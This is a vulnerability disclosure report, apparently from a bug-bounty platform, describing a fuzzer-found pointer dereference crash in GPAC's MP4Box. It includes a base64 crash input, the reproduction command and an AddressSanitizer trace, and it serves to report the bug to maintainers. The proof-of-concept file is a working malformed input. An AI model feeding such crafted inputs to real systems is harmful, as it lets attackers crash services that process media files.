Untrusted Pointer Dereference in gpac/gpac
Valid
Reported on Mar 8th 2022
Description
Null Pointer Dereference in gpac
Proof of Concept
Version:
~/fuzzing/gpac/gpac/bin/gcc/MP4Box -version
MP4Box - GPAC version 2.1-DEV-rev15-g6c0f4ff03-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration:
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
System information: Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz
poc (base64):
Q0dDMAAA//RkRDIAAgAQBQA////oA9z///91sSMAwERYRB1MAABbRERERERERP//dQHoAwAAAUMA
AAFEdHIB3QD9AAAA7gBC3QABQwAAAUR0cmFrOwAAAUEBCwAAGELdAP0AAALuAEL4AAFDRERERERE
RP//dQHoAwAAAQwAAABBAX//6APm////dQGxIwDARFhEHUwAAFtERERERERE
command:
./MP4Box -info poc
Result
~/fuzzing/gpac/gpac/bin/gcc/MP4Box -info ./poc
[Core] exp-golomb read failed, not enough bits in bitstream !
[HEVC] Warning: Error parsing NAL unit
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1172475==ERROR: AddressSanitizer: SEGV on unknown address 0x00010000000d (pc 0x7f031b4ec838 bp 0x000000000002 sp 0x7ffca1f029b8 T0)
==1172475==The signal is caused by a READ memory access.
#0 0x7f031b4ec837 (/lib/x86_64-linux-gnu/libasan.so.5+0x12e837)
#1 0x7f031b4ec9d1 (/lib/x86_64-linux-gnu/libasan.so.5+0x12e9d1)
#2 0x7f031b4ec60b (/lib/x86_64-linux-gnu/libasan.so.5+0x12e60b)
#3 0x7f031b3ea141 (/lib/x86_64-linux-gnu/libasan.so.5+0x2c141)
#4 0x7f031b3e6e1f (/lib/x86_64-linux-gnu/libasan.so.5+0x28e1f)
#5 0x7f031b4cc0b1 in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10e0b1)
#6 0x7f031abc5655 in gf_list_add (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0xac655)
#7 0x7f031b0ca909 in naludmx_process (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x5b1909)
#8 0x7f031afa67ef in gf_filter_process_task (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x48d7ef)
#9 0x7f031af944d3 in gf_fs_thread_proc (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x47b4d3)
#10 0x7f031af9943a in gf_fs_run (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x48043a)
#11 0x7f031ae07151 in gf_media_import (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x2ee151)
#12 0x5613ea17fdc2 in convert_file_info (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x3ddc2)
#13 0x5613ea16e6d2 in mp4boxMain (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x2c6d2)
#14 0x7f031a94b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
#15 0x5613ea15b53d in _start (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x1953d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libasan.so.5+0x12e837)
==1172475==ABORTING
Timeline
a year ago: We are processing your report and will contact the gpac team within 24 hours.
a year ago: We have contacted a member of the gpac team and are waiting to hear back.
a year ago: We have sent a follow up to the gpac team. We will try again in 7 days.
a year ago: We have sent a second follow up to the gpac team. We will try again in 10 days.